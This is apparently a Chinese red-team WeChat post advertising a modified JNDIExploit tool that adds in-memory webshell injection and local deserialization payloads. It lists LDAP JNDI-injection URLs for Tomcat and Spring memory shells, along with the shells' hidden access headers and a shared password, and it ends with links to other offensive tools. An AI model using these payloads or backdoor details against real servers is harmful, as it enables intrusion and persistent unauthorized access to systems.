【红队】JNDIExploit 改进版

pap1rman 贝雷帽SEC 2025-04-25 05:24

免责声明

本公众号所提供的文字和信息仅供学习和研究使用，
请读者自觉遵守法律法规，不得利用本公众号所提供的信息从事任何违法活动。本公众号不对读者的任何违法行为承担任何责任
。
工具来自网络，安全性自测，如有侵权请联系删除。

工具介绍

对原版JNDIExploit进行修改增加内存马模块和本地序列化文件利用方式

新功能 内存马注入，本地序列化文件

内存马路径任意，连接时候添加Referer头https://www.google.com。并通过x-client-data头指定shell类型godzilla/rebeyond/cmd密码统一为goole 

ldap://127.0.0.1:1389/Basic/tomcatMemshellall1 //注入filter内存马
ldap://127.0.0.1:1389/Basic/tomcatMemshellall2 //注入Listener内存马
ldap://127.0.0.1:1389/Basic/springmemshellall1
ldap://127.0.0.1:1389/tomcatBypass/tomcatmemshellall1 // bypypass绕过方式注入内存shell 
ldap://127.0.0.1:1389/tomcatBypass/tomcatmemshellall2
ldap://127.0.0.1:1389/tomcatBypass/springmemshellall1

新增自定义反序列化可以将yso等反序列化内容放到本地然后加载

工具使用

下载链接

回复关键字【250425】获取下载链接

End

“点赞、在看与分享都是莫大的支持”

工具精选

【红队】一款红队在大量的资产中存活探测与重点攻击系统指纹探测工具

【红队】集成一站式企业信息资产收集、网络资产测绘的工具。

【红队】内网渗透工具-Viper最新版本

【红队】一个辅助平常渗透测试项目或者攻防项目快速打点的综合工具

【红队】afrog v2.7.2 新版本发布

【红队】横向移动命令执行工具—WMIHACKER

【红队】Aboutveinmind-tools 容器安全工具集

【红队】一个集成了非常多渗透测试工具

【红队】一款内网综合扫描工具，一键自动化、全方位漏扫。

【红队】红队快速打点工具-POC-bomber v3.0.0 版本

【红队】Medusa—红队武器库平台

【红队】一款C2设施前置流量控制工具

【红队】集成 vscan、nuclei、ksubdomain、subfinder等工具的打点神器–scan4all

【红队】网络安全单兵作战工具-YAKIT

【红队】最新 Burpsuite Professional 2023.6.1